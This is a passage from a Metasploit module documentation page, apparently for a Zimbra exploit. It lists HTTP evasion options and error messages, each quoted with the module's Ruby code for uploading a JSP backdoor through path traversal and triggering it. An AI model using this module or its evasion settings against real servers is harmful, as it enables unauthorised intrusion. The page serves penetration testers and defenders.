   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apac
                                                            he)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apa
                                                            che)
   HTTP::shuffle_get_params      false            no        Randomize order of GET parameters
   HTTP::shuffle_post_params     false            no        Randomize order of POST parameters
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all,
                                                            u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

TARGET_FILENAME does not end with .jsp, was that intentional?


Here is a relevant code snippet related to the "TARGET_FILENAME does not end with .jsp, was that intentional?" error message:

82:	  end
83:	
84:	  # Generate an on-system filename using datastore options
85:	  def generate_target_filename
86:	    if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp')
87:	      print_warning('TARGET_FILENAME does not end with .jsp, was that intentional?')
88:	    end
89:	
90:	    File.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || "#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp")
91:	  end
92:	

Could not connect to the target port (<RPORT>)


Here is a relevant code snippet related to the "Could not connect to the target port (<RPORT>)" error message:

127:	      'data' => data
128:	    )
129:	
130:	    # Check the response
131:	    if res.nil?
132:	      fail_with(Failure::Unreachable, "Could not connect to the target port (#{datastore['RPORT']})")
133:	    elsif res.code == 404
134:	      fail_with(Failure::NotFound, 'The target path was not found, target is probably not vulnerable')
135:	    elsif res.code != 401
136:	      print_warning("Unexpected response from the target (expected HTTP/401, got HTTP/#{res.code}) - exploit likely failed")
137:	    end

The target path was not found, target is probably not vulnerable


Here is a relevant code snippet related to the "The target path was not found, target is probably not vulnerable" error message:

129:	
130:	    # Check the response
131:	    if res.nil?
132:	      fail_with(Failure::Unreachable, "Could not connect to the target port (#{datastore['RPORT']})")
133:	    elsif res.code == 404
134:	      fail_with(Failure::NotFound, 'The target path was not found, target is probably not vulnerable')
135:	    elsif res.code != 401
136:	      print_warning("Unexpected response from the target (expected HTTP/401, got HTTP/#{res.code}) - exploit likely failed")
137:	    end
138:	
139:	    # Get the public path for triggering the vulnerability, terminate if we

Unexpected response from the target (expected HTTP/401, got HTTP/<RES.CODE>) - exploit likely failed


Here is a relevant code snippet related to the "Unexpected response from the target (expected HTTP/401, got HTTP/<RES.CODE>) - exploit likely failed" error message:

131:	    if res.nil?
132:	      fail_with(Failure::Unreachable, "Could not connect to the target port (#{datastore['RPORT']})")
133:	    elsif res.code == 404
134:	      fail_with(Failure::NotFound, 'The target path was not found, target is probably not vulnerable')
135:	    elsif res.code != 401
136:	      print_warning("Unexpected response from the target (expected HTTP/401, got HTTP/#{res.code}) - exploit likely failed")
137:	    end
138:	
139:	    # Get the public path for triggering the vulnerability, terminate if we
140:	    # can't figure it out
141:	    public_filename = zimbra_get_public_path(target_filename)

Could not determine the public web path, maybe you need to traverse further back?


Here is a relevant code snippet related to the "Could not determine the public web path, maybe you need to traverse further back?" error message:

138:	
139:	    # Get the public path for triggering the vulnerability, terminate if we
140:	    # can't figure it out
141:	    public_filename = zimbra_get_public_path(target_filename)
142:	    if public_filename.nil?
143:	      fail_with(Failure::BadConfig, 'Could not determine the public web path, maybe you need to traverse further back?')
144:	    end
145:	
146:	    register_file_for_cleanup(target_filename)
147:	
148:	    print_status("Trying to trigger the backdoor @ #{public_filename}")

Could not connect to trigger the payload


Here is a relevant code snippet related to the "Could not connect to trigger the payload" error message:

152:	      'method' => 'GET',
153:	      'uri' => normalize_uri(public_filename)
154:	    )
155:	
156:	    if res.nil?
157:	      fail_with(Failure::Unreachable, 'Could not connect to trigger the payload')
158:	    elsif res.code == 200
159:	      print_good('Successfully triggered the payload')
160:	    elsif res.code == 404
161:	      fail_with(Failure::Unknown, "Payload was not uploaded, the server probably isn't vulnerable")
162:	    else

Payload was not uploaded, the server probably isn't vulnerable


Here is a relevant code snippet related to the "Payload was not uploaded, the server probably isn't vulnerable" error message:

156:	    if res.nil?
157:	      fail_with(Failure::Unreachable, 'Could not connect to trigger the payload')
158:	    elsif res.code == 200
159:	      print_good('Successfully triggered the payload')
160:	    elsif res.code == 404
161:	      fail_with(Failure::Unknown, "Payload was not uploaded, the server probably isn't vulnerable")
162:	    else
163:	      fail_with(Failure::Unknown, "Could not connect to the server to trigger the payload: HTTP/#{res.code}")
164:	    end
165:	  end
166:	end

Could not connect to the server to trigger the payload: HTTP/<RES.CODE>


Here is a relevant code snippet related to the "Could not connect to the server to trigger the payload: HTTP/<RES.CODE>" error message:

156:	    if res.nil?
157:	      fail_with(Failure::Unreachable, 'Could not connect to trigger the payload')
158:	    elsif res.code == 200
159:	      print_good('Successfully triggered the payload')
160:	    elsif res.code == 404
161:	      fail_with(Failure::Unknown, "Payload was not uploaded, the server probably isn't vulnerable")
162:	    else
163:	      fail_with(Failure::Unknown, "Could not connect to the server to trigger the payload: HTTP/#{res.code}")
164:	    end
165:	  end
166:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Volexity Threat Research
  • Yang_99's Nest
  • Ron Bowes

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.